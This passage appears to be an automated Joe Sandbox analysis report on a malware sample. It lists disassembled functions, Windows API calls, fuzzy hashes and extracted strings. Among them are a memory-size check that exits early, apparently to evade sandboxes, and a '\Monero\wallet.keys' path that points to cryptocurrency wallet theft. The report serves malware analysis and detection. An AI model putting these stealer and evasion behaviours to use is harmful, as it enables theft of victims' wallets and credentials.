Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
Instruction ID: a57ad703dd1ff59bce20c082efda804b174ce4f8819002a61e2aa5c29e7e9215
Opcode Fuzzy Hash: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
Instruction Fuzzy Hash: A7312D74A00209EFDB14CF95C986BEE7BB5FF48345F208159E911A7290D778A941CFA1

Function 00554780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0127DD30), ref: 005547DB

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

lstrcat.KERNEL32(?,00000000), ref: 00554801
lstrcat.KERNEL32(?,?), ref: 00554820
lstrcat.KERNEL32(?,?), ref: 00554834
lstrcat.KERNEL32(?,0126AF28), ref: 00554847
lstrcat.KERNEL32(?,?), ref: 0055485B
lstrcat.KERNEL32(?,0127D0D8), ref: 0055486F

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F

Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 75721bc36094d964274e9bb4b4836a9b89e1d3c27535f489bd7e63edf0a9ae5b
Instruction ID: 917364238f3c4f99cafae1a2679d49ade54b1f4138dbc749ce9fe54ff895cede
Opcode Fuzzy Hash: 75721bc36094d964274e9bb4b4836a9b89e1d3c27535f489bd7e63edf0a9ae5b
Instruction Fuzzy Hash: 2E3173B294020967DB10FBB0DC99EE9777CBB88701F40458AB715A6081EE7897CD8FA5

Function 00541220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
__aulldiv.LIBCMT ref: 00541258
__aulldiv.LIBCMT ref: 00541266
ExitProcess.KERNEL32 ref: 00541294

Strings

@, xrefs: 00541233

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D

Function 005570D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

memset.MSVCRT ref: 0055716A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
sU, xrefs: 00557111
sU, xrefs: 005572AE, 00557179, 0055717C

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-2944379081
Opcode ID: f57505989ccafdf5bdfdd074385baf9c4cfeb172df039ed454ee19b72da605a6
Instruction ID: 8d65adee658c14d671d75d2be06e63ce54182c89e3b444667f1defa1c383b861
Opcode Fuzzy Hash: f57505989ccafdf5bdfdd074385baf9c4cfeb172df039ed454ee19b72da605a6
Instruction Fuzzy Hash: A4517CB0C0420D9BDB14EB90DCA9BEEBB74BF58305F5041AAE91567181EB746A8CCF54

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2329253397.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2329233893.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329331748.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 00557E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
RegOpenKeyExA.KERNEL32(80000002,0126B850,00000000,00020119,?), ref: 00557E5E
RegQueryValueExA.KERNEL32(?,0127D178,00000000,00000000,000000FF,000000FF), ref: 00557E7F
RegCloseKey.ADVAPI32(?), ref: 00557E92

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1

Function 005412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 005412D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
RegCloseKey.ADVAPI32(?), ref: 005412FF

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55

Function 0054A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01278B60,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0054A0BD
LoadLibraryA.KERNEL32(0127D2B8), ref: 0054A146

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

SetEnvironmentVariableA.KERNEL32(01278B60,00000000,00000000,?,005612D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00560AFE), ref: 0054A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0054A0B2, 0054A0C6, 0054A0DC

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b94659f9d8906cc0b8744ade1e38b9d3cdd3693a3bfb0d8b3e5017e7543ca8f0
Instruction ID: 97e3d84c4b788fa8107e3a85d4a19e5cc41ac496cff79336c159ff78afae2a53
Opcode Fuzzy Hash: b94659f9d8906cc0b8744ade1e38b9d3cdd3693a3bfb0d8b3e5017e7543ca8f0
Instruction Fuzzy Hash: 844164B1A81205BFE704DFA4FC59AEA3B74BB48305F28811AF505932A4FB3C6945CB57

Function 0054A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
